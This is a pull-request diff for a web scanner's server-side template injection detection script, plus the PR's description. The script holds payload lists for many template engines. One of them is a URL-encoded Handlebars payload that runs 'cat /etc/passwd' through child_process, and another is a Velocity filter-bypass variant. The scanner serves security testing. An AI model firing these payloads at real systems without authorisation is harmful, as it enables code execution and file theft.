 	// Check if the scan was stopped before performing lengthy tasks
 	if (as.isStop()) {
-		return
+		return;
 	}
 
-    // Fuzz for SSTI and detect template engine in use by inducing errors
-    sstiFuzzEngineErrorDetect(as, sstiFuzzMessage, param);
+	// Fuzz for SSTI and detect template engine in use by inducing errors
+	sstiFuzzEngineErrorDetect(as, sstiFuzzMessage, param);
 
 	// Fuzz for SSTI and detect template engine in use by evaluating an expression
 	sstiFuzzEngineMathDetect(as, sstiFuzzMessage, param);
@@ -60,12 +60,12 @@ function scan(as, msg, param, value) {
 function sstiFuzzEngineErrorDetect(as, msg, param) {
 
 	logger("SSTI Error Based Engine Detection Started...");
-    
-    // Attacks for generating errors to detect the template engine being used
+
+	// Attacks for generating errors to detect the template engine being used
 	// We are using two types of errors mostly, because sometimes some types of errors are handled without output
-		// a) Undeclared variable
-		// b) Division by zero
-    var errorGenerateAttacks = [
+	// a) Undeclared variable
+	// b) Division by zero
+	var errorGenerateAttacks = [
 		"<%= foobar %>", // ruby erb
 		"<%= 7/0 %>", // ruby erb
 		"{{1/0}}", // tornado / handlebars / twig / django
@@ -81,7 +81,9 @@ function sstiFuzzEngineErrorDetect(as, msg, param) {
 		"${{<%[%'\"}}%\." // SSTI polyglot
 	];
 
-	for (const err of errorGenerateAttacks) {
+	for (var i = 0; i < errorGenerateAttacks.length; i++) {
+
+		var err = errorGenerateAttacks[i];
 
 		// Copy requests before reusing them
 		var fuzzMsg = msg.cloneRequest();
@@ -96,10 +98,11 @@ function sstiFuzzEngineErrorDetect(as, msg, param) {
 		// Possible template engines
 		var templateEngines = ["jinja", "django", "tornado", "erb", "freemarker", "handlebars", "velocity", "twig", "dot", "dust", "smarty", "mako", "Slim", "ejs", "Infinity", "INF"];
 
-		for (const engine of templateEngines) {
+		for (var j = 0; j < templateEngines.length; j++) {
 
+			var engine = templateEngines[j];
 			if (respBody.includes(engine)) {
-				
+
 				logger("Server Side Template Injection Found! Raising Alert...");
 				raiseAlert(as, fuzzMsg, err, engine, 2, param, engine);
 				logger("SSTI Error Based Engine Detection Completed...");
@@ -121,26 +124,26 @@ function sstiFuzzEngineErrorDetect(as, msg, param) {
 function sstiFuzzEngineMathDetect(as, msg, param) {
 
 	logger("SSTI Expression Evaluation Based Engine Detection Started...");
-	
+
 	// Attacks for injecting an expression and checking the response to see if it got evaluated
 	var equationExecuteAttacks = {
-		"ERB/EJS":["<%= 9*1371742 %>", "12345678"], // outputs 12345678
-		"Jinja2":["{{8*'7'}}", "77777777"], // Outputs 77777777
-		"Smarty":["{9*1371742}", "12345678"], // Outputs 12345678
-		"Tornado/Twig/Nunjucks/Vue.js/Smarty":["{{9*1371742}}", "12345678"], //outputs 12345678
-		"Freemarker":["${9*1371742}", "12,345,678"], // Outputs 12,345,678
-		"Mako":["${9*1371742}", "12345678"], // Outputs 12345678 
-		"Handlebars":["%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%3b%22%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d", "/bin/bash"], // Check for /bin/bash in output
-		"velocity":["#set ($run=9*1371742) $run", "12345678"], // outputs 12345678
-		"Velocity":["#{set} ($run=9*1371742) $run", "12345678"], // In case 'set' is blacklisted in velocity circumvent like this, outputs 12345678
-		"django":["{% widthratio 9 1 1371742 %}", "12345678"], // outputs 12345678
-		"Django":["{% debug %}", "django"], // Check output for "django"
-		"Dot":["{{=9*1371742}}", "12345678"], //Outputs 12345678
-		"Dust":['{@math key="9" method="multiply" operand="1371742"/}', "12345678"], // Outputs 12345678
-		"Slim/Jade":["#{9*1371742}", "12345678"], // Outputs 12345678
+		"ERB/EJS": ["<%= 9*1371742 %>", "12345678"], // outputs 12345678
+		"Jinja2": ["{{8*'7'}}", "77777777"], // Outputs 77777777
+		"Smarty": ["{9*1371742}", "12345678"], // Outputs 12345678
+		"Tornado/Twig/Nunjucks/Vue.js/Smarty": ["{{9*1371742}}", "12345678"], //outputs 12345678
+		"Freemarker": ["${9*1371742}", "12,345,678"], // Outputs 12,345,678
+		"Mako": ["${9*1371742}", "12345678"], // Outputs 12345678 
+		"Handlebars": ["%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%3b%22%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d", "/bin/bash"], // Check for /bin/bash in output
+		"velocity": ["#set ($run=9*1371742) $run", "12345678"], // outputs 12345678
+		"Velocity": ["#{set} ($run=9*1371742) $run", "12345678"], // In case 'set' is blacklisted in velocity circumvent like this, outputs 12345678
+		"django": ["{% widthratio 9 1 1371742 %}", "12345678"], // outputs 12345678
+		"Django": ["{% debug %}", "django"], // Check output for "django"
+		"Dot": ["{{=9*1371742}}", "12345678"], //Outputs 12345678
+		"Dust": ['{@math key="9" method="multiply" operand="1371742"/}', "12345678"], // Outputs 12345678
+		"Slim/Jade": ["#{9*1371742}", "12345678"], // Outputs 12345678
 	};
 
-	for(var i in equationExecuteAttacks) {
+	for (var i in equationExecuteAttacks) {
 
 		// Copy requests before reusing them
 		var fuzzMsg = msg.cloneRequest();
@@ -157,7 +160,7 @@ function sstiFuzzEngineMathDetect(as, msg, param) {
 		var respBody = fuzzMsg.getResponseBody().toString();
 
 		if (respBody.includes(evidence)) {
-			
+
 			logger("Server Side Template Injection Found! Raising Alert...");
 			raiseAlert(as, fuzzMsg, payload, evidence, 3, param, i);
 			logger("SSTI Expression Evaluation Based Engine Detection Completed...");
@@ -222,9 +225,9 @@ function raiseAlert(as, msg, payload, evidence, confidence, param, engine) {
  */
 function toTitleCase(str) {
 	return str.replace(
-	  /\w\S*/g,
-	  function(txt) {
-		return txt.charAt(0).toUpperCase() + txt.substr(1).toLowerCase();
-	  }
+		/\w\S*/g,
+		function(txt) {
+			return txt.charAt(0).toUpperCase() + txt.substr(1).toLowerCase();
+		}
 	);
 }

--- a/active/SSTI.js
+++ b/active/SSTI.js
@@ -131,9 +131,9 @@ function sstiFuzzEngineMathDetect(as, msg, param) {
 		"Freemarker":["${9*1371742}", "12,345,678"], // Outputs 12,345,678
 		"Mako":["${9*1371742}", "12345678"], // Outputs 12345678 
 		"Handlebars":["%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%3b%22%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d", "/bin/bash"], // Check for /bin/bash in output
-		"Velocity":["#set ($run=9*1371742) $run", "12345678"], // outputs 12345678
+		"velocity":["#set ($run=9*1371742) $run", "12345678"], // outputs 12345678
 		"Velocity":["#{set} ($run=9*1371742) $run", "12345678"], // In case 'set' is blacklisted in velocity circumvent like this, outputs 12345678
-		"Django":["{% widthratio 9 1 1371742 %}", "12345678"], // outputs 12345678
+		"django":["{% widthratio 9 1 1371742 %}", "12345678"], // outputs 12345678
 		"Django":["{% debug %}", "django"], // Check output for "django"
 		"Dot":["{{=9*1371742}}", "12345678"], //Outputs 12345678
 		"Dust":['{@math key="9" method="multiply" operand="1371742"/}', "12345678"], // Outputs 12345678
@@ -146,8 +146,8 @@ function sstiFuzzEngineMathDetect(as, msg, param) {
 		var fuzzMsg = msg.cloneRequest();
 
 		// Set payload and evidence
-		payload = equationExecuteAttacks[i][0];
-		evidence = equationExecuteAttacks[i][1];
+		var payload = equationExecuteAttacks[i][0];
+		var evidence = equationExecuteAttacks[i][1];
 
 		// setParam (message, parameterName, newValue)
 		as.setParam(fuzzMsg, param, payload);
@@ -179,7 +179,7 @@ function sstiFuzzEngineMathDetect(as, msg, param) {
  */
 function raiseAlert(as, msg, payload, evidence, confidence, param, engine) {
 
-	badErrors = ["Infinity", "INF"];
+	var badErrors = ["Infinity", "INF"];
 
 	//Alert variables
 	var pluginId = 1204650;


### PR DESCRIPTION
### Details
Server Side Template Injection (SSTI) occurs when user input is directly embedded into the template without any proper sanitization, a hacker can use this vulnerability to inject malicious code and try to achieve remote code execution. 

This script uses two techniques to identify the vulnerability and further identify the template engine in use:

1. Error induction
2. Expression evaluation

This script has payloads for most of the major and some minor template engines. 

Namely: 

- Jinja2
- Django
- Tornado
- ERB
- Freemarker
- Handlebars
- Velocity
- Twig
- Dot
- Dust
- Smarty
- Mako
- Slim
- EJS

### Screenshot
![ssti](https://user-images.githubusercontent.com/59091280/151976475-ab5ce88e-c525-452b-b092-62df33784a26.png)

### Testing
Feel free to test this scanner rule on [online labs](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic) or [locally hosted vulnerable SSTI instances](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)

#### Made by [Astra Security](https://www.getastra.com/)

Signed-off-by: Karthik UJ karthik.uj@getastra.com